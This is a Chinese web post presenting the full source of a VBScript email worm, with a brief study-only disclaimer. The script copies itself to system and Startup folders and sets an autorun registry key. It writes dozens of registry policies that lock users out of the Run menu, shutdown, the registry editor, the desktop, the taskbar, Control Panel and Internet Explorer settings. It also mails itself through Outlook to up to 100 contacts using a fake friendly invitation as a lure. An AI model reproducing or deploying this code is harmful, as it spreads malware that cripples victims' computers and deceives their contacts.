vbs病毒代码举例

此代码会被卡巴斯基杀掉，对于安装卡巴的电脑没有危害，此代码只供参考学习之用，请勿使用在不正当地方。

On Error Resume Next

Set fs=CreateObject("Scripting.FileSystemObject")

Set dir1=fs.GetSpecialFolder(0)

Set dir2=fs.GetSpecialFolder(1)

Set so=CreateObject("Scripting.FileSystemObject")

dim r

Set r=CreateObject("Wscript.Shell")

so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")

so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")

so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")

//分别复制病毒到windows/winnt，system/system32，启动菜单下

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" //禁止“关闭系统”菜单

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" //隐藏盘符

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" //禁止使用注册表编辑器

r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" //禁止注册表扫描

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" //禁止“注销”菜单

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" //禁止进入MS-DOS实模式

r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // 运行这个病毒拉（开机自动运行）

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" //禁止显示桌面所有图标（就是桌面上什么都没拉，只看见蓝天^_^）

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" //这个大概是禁止进入MS-DOS模式拉

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" //禁止任务栏和开始菜单了

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" //禁止鼠标右键

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" //禁止控制面板

r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" //禁止使用REG文件

r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " //这个就是开机提示的标题了

r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " //开机提示的内容

Set ol=CreateObject("Outlook.Application") //这个是开始发信了（病毒要传播嘛）

On Error Resume Next

For x=1 To 100 //很明显，是给你的100个好友发信，这个值你可以自定义拉

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="还在忙吗？" //信的标题

Mail.Body="朋友你好：您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件，祝您好运！ 来自Rose的问候！" //信的内容

Mail.Attachments.Add(dir2&"Win32system.vbs") //当他打开信后（当然是附件），这个就进驻他的磁盘了！！！害怕吧

Mail.Send

Next

ol.Quit

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" //IE的右键被禁用拉

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" //Internet选项也禁用拉

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // 想“另存为”，没门！！！

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // 禁用“文件打开”

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // 禁止更改高级设置

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // 临时文件设置也被禁止更改哦

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // “自动配置”禁止更改

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // 想更改你的主页，算了吧！

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // “历史记录设置”也不能更改了

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // “Internet连接向导”

r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // 这是设置的默认首页

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // 禁止安全项，

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // 禁止“重置web设置”

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // 查看源文件也不行，太毒了吧！～

r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // 添加脱机页计划 禁用

r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // 禁止资源管理器中文件菜单（想打开文件也^_^不行）